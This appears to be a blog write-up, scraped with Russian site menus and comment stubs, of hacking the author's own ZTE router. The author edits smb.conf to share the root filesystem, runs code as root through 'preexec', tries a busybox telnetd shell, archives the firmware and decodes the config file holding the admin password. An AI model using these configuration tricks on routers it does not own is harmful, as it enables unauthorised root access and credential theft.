    comment = samba share root
    read only = no
    guest ok = yes
    guest only = yes
    short preserve case = yes
    preserve case = yes
    max connections = 3
    path = /

I saved it and it worked:

Now we can see the content of the whole file system and maybe edit it. But wait, if you have configured a Samba server before you must be thinking about “preexec” or “root preexec” option.

From https://www.samba.org/samba/docs/using_samba/ch08.html

Yep, it is what it seems. We can run code by just editing the samba. One thing that worth mention is that the option root preexec doesn’t exist on this samba version, but I managed to run code as root by adding the following option at the beginning of the configuration file:

guest account = root

If you check the original content of the file, you will notice that it was running as nobody. Well, now we are running samba as root, and even executing code.

We are almost done. Now we need to extract the content of the router, so we can analyze it peacefully without the need to be using this old and broken samba.

I copied busybox for arm systems with the name busybox. And then added the following option to the smb.conf:

preexec = /mnt/usb1_1/busybox telnetd -b 192.168.1.1:27 -l /mnt/usb1_1/sh

When I checked the port with nmap, it showed that the port was open but it didn’t detect the telnet service. I tried to connect to it using Putty but I wasn’t lucky. After a few hours of playing with the different binaries and options from busybox and the router, I gave up and decided to use what I had at the moment.

I created a script /mnt/usb1_1/backup.sh and added the following content:

/mnt/usb1_1/busybox tar -cvzf /mnt/usb1_1/firmware.tar.gz --exclude=/mnt --exclude=/proc --exclude=/tmp --exclude=/dev --exclude=/kmodule --exclude=/sys / > /mnt/usb1_1/run2.txt
chmod -x /mnt/usb1_1/backup.sh

backup.sh

I gave it execution permissions by doing preexec = chmod +x /mnt/usb1_1/backup.sh. If you notice the second line, it will remove the execution flag from the file. This is because we just want to run the command once and avoid crashing the router. I also excluded some folders, most of them are virtual directories that are mounted by the router and something could go wrong if we try to copy them.

Recovering my admin password

The best part was at the end when my ISP changed my admin password because I asked them to reconfigure my router after a few failed attempts of recovering their configurations. And I used this whole process again to extract the web admin password from the router that they didn’t want to give me. How?

I mounted the pen drive, modified the smb.conf and exposed the whole file system. Then I extracted the file located at `/userconfig/cfg/db_backup_cfg.xml`. This file is stored using Zlib compression. I found this script on StackOverflow that prints the plain text content of the XML file:

import re
import zlib
import struct


def extract_config_xml(config_bin):
    config_xml = b''
    for zlib_chunk in re.finditer('\x78\xda', config_bin):
        zlib_chunk_start = zlib_chunk.start()
        zlib_chunk_header = config_bin[zlib_chunk_start - 12: zlib_chunk_start]
        xml_chunk_length, zlib_chunk_length, config_bin_length = \
            struct.unpack('>LLL', zlib_chunk_header)
        if xml_chunk_length == 0x10000 or config_bin_length == 0:
            zlib_chunk_end = zlib_chunk_start + zlib_chunk_length
            zlib_chunk = config_bin[zlib_chunk_start: zlib_chunk_end]
            xml_chunk = zlib.decompress(zlib_chunk)
            assert xml_chunk_length == len(xml_chunk)
            config_xml += xml_chunk
    return config_xml


with open('db_backup_cfg.xml', 'rb') as f:
    print extract_config_xml(f.read())

https://reverseengineering.stackexchange.com/questions/3593/re-compressed-backup-file-router-linux-based-so-is-it-compresed-with-zlib#9246

Conclusion

Of course, I crashed the router multiple times, reset it to default once and even ask my ISP to configure the router again because I was having connection issues. But it was fun, now I have the whole firmware of the rooter, which I may be uploading to github soon, and I also exploited an old fashion bug on samba.

Failed attempt:

I downloaded the source code and run a quick static scanner called FlawFinder. The output showed 1517 hits as possible vulnerabilities. Too many to validate, so I focused on any possible unauthenticated buffer overflow. I saw they where using getpass in multiple parts of the source to grab and manipulate the password. FlawFinder also gave me the following info:

This function is obsolete and not portable. It was in SUSv2 but removed by POSIX.2. What it does exactly, varies considerably between systems, particularly in where its prompt is displayed and where it gets its data (e.g., /dev/tty, stdin, stderr, etc.). In addition, some implementations overflow buffers. (CWE-676, CWE-120, CWE-20). Make the specific calls to do exactly what you want. If you continue to use it, or write your own, be sure to zero the password as soon as possible to avoid leaving the cleartext password visible in the process’ address space.

By doing a little more research I found out that the version 1.9.17 was actually vulnerable to a buffer overflow on the password. I found a public exploit and the CVE-1999-0182. As expected this exploit didn’t work at the first try, therefore I had to modify it a little bit to make it runnable.

After a few modifications and checking the SMB packets sent to the user I ended up with the conclusion it wasn’t vulnerable. I think that for this exploit to work, plain text password needs to be enabled, in order to trigger the overflow. Not sure about this, but I wanted to mention it, maybe someone knows why it didn’t work, or it could be just a custom version of samba with some patches.

Источник

Выбор роутера ZTE

Подготовка к настройке

Установка необходимых программ

Создание сетевых папок на роутере

Что такое FTP, Samba, DLNA?

В чем отличие FTP, Samba (smb) и DLNA серверов?

DLNA

Samba

FTP

Что лучше на роутере — DLNA, Samba или FTP?

Актуальные предложения:

Описание сервиса самба на роутере ZTE

Настройка сервиса самба на роутере ZTE

Возможности использования сервиса самба на роутере ZTE

6 комментариев к «ZTE680 Hardware V4.0 (V2?) Hack»

Обзор

Самба

Восстановление пароля администратора

Заключение

Неудачная попытка:

Попугай69

Отлично

гггплайя

Выдающийся

Ралстон18

Титан

Ралстон18

Титан

гггплайя

Выдающийся

Попугай69

Отлично

Попугай69

Отлично

TL;DR

Overview

Samba

Recovering my admin password

Conclusion

Failed attempt:

Другие наши интересноые статьи: